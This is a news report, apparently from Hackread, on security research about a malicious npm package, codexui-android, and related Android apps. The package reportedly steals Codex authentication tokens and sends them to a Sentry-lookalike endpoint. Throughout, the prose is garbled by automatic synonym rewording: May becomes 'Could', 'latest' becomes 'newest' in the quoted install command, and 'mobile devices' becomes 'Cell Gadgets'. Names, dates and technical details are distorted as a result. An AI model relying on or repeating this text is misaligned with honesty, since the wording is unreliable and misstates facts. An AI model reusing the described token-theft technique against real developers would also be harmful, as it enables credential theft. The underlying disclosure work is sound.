A well-liked software program instrument utilized by hundreds of cellular builders has been discovered stealing authentication tokens. On 27 Could 2026, Aikido Safety shared analysis with Hackread.com a few malicious npm package deal known as codexui-android.
For context, it’s a extremely common distant net person interface for OpenAI Codex, a man-made intelligence (AI) mannequin that writes code, gathering roughly 27,000 weekly downloads.
Aikido Safety’s researcher, Charlie Eriksen, found that this package deal ran a provide chain assault final month to steal person knowledge.
Hiding in Plain Sight
Apparently, the attackers didn’t use customary tips like typosquatting or account hijacking; as a substitute, they developed a genuinely great tool. This was most likely performed to kind an actual person base earlier than weaponising it. Furthermore, the malicious code doesn’t exist within the public GitHub repository, and solely seems within the revealed npm package deal. This implies an ordinary supply code audit would definitely miss it.
The assault triggers instantly at module load. The very first line of dist-cli/index.js imports a hidden script named chunk-PUR7OUAG.js. It rapidly checks for native credentials. If discovered, an information exfiltration routine is launched to steal access_token, id_token, account ID, and the refresh_token from the auth.json file. Extra problematic is {that a} refresh_token doesn’t expire; therefore, the attackers can impersonate the sufferer indefinitely.
To cover the community visitors, the code sends the stolen knowledge to a server endpoint named sentry.anyclawstore. This was chosen deliberately to mix in with regular Sentry error-reporting telemetry. Contained in the hidden supply map, the creator even left a transparent remark: “Ship tokens to our startlog endpoint (at all times)”.
Focusing on Cell Gadgets
Researchers famous within the weblog submit that this risk actor additionally targets Android cellular units. The creator revealed apps on the Google Play Retailer beneath the developer id BrutalStrike, who additionally owns a reliable cellular sport with over 5 million downloads.
Two particular apps, a paid productiveness app known as codex.app and one other known as “OpenClaw Codex Claude AI Agent”, comprise the identical malicious infrastructure.
The Android apps simply cross Google’s pre-publish safety scans as a result of the preliminary 26 MB APK file appears fully clear. As soon as put in, the app extracts a Termux-derived Linux userland into personal storage and launches Node.js utilizing PRoot. It then runs a command to put in the newest model of the npm package deal: pnpm add codexui-android@newest. The exfiltration has been energetic since model [email protected].
When Eriksen confronted the creator, they briefly posted a remark claiming they misplaced entry to their npm account. They deleted it shortly after, changing it with a company assertion denying any credential theft.
As of as we speak, the malicious software program package deal and the apps are nonetheless stay on-line.
“AI developer tooling is turning into a high-value goal exactly as a result of the tokens are highly effective and long-lived… a risk actor invested actual effort into constructing a reputable, helpful undertaking to make use of as cowl. The legitimacy is the assault vector. As AI instruments proliferate and builders attain for productiveness shortcuts, anticipate extra of this,” researchers concluded.
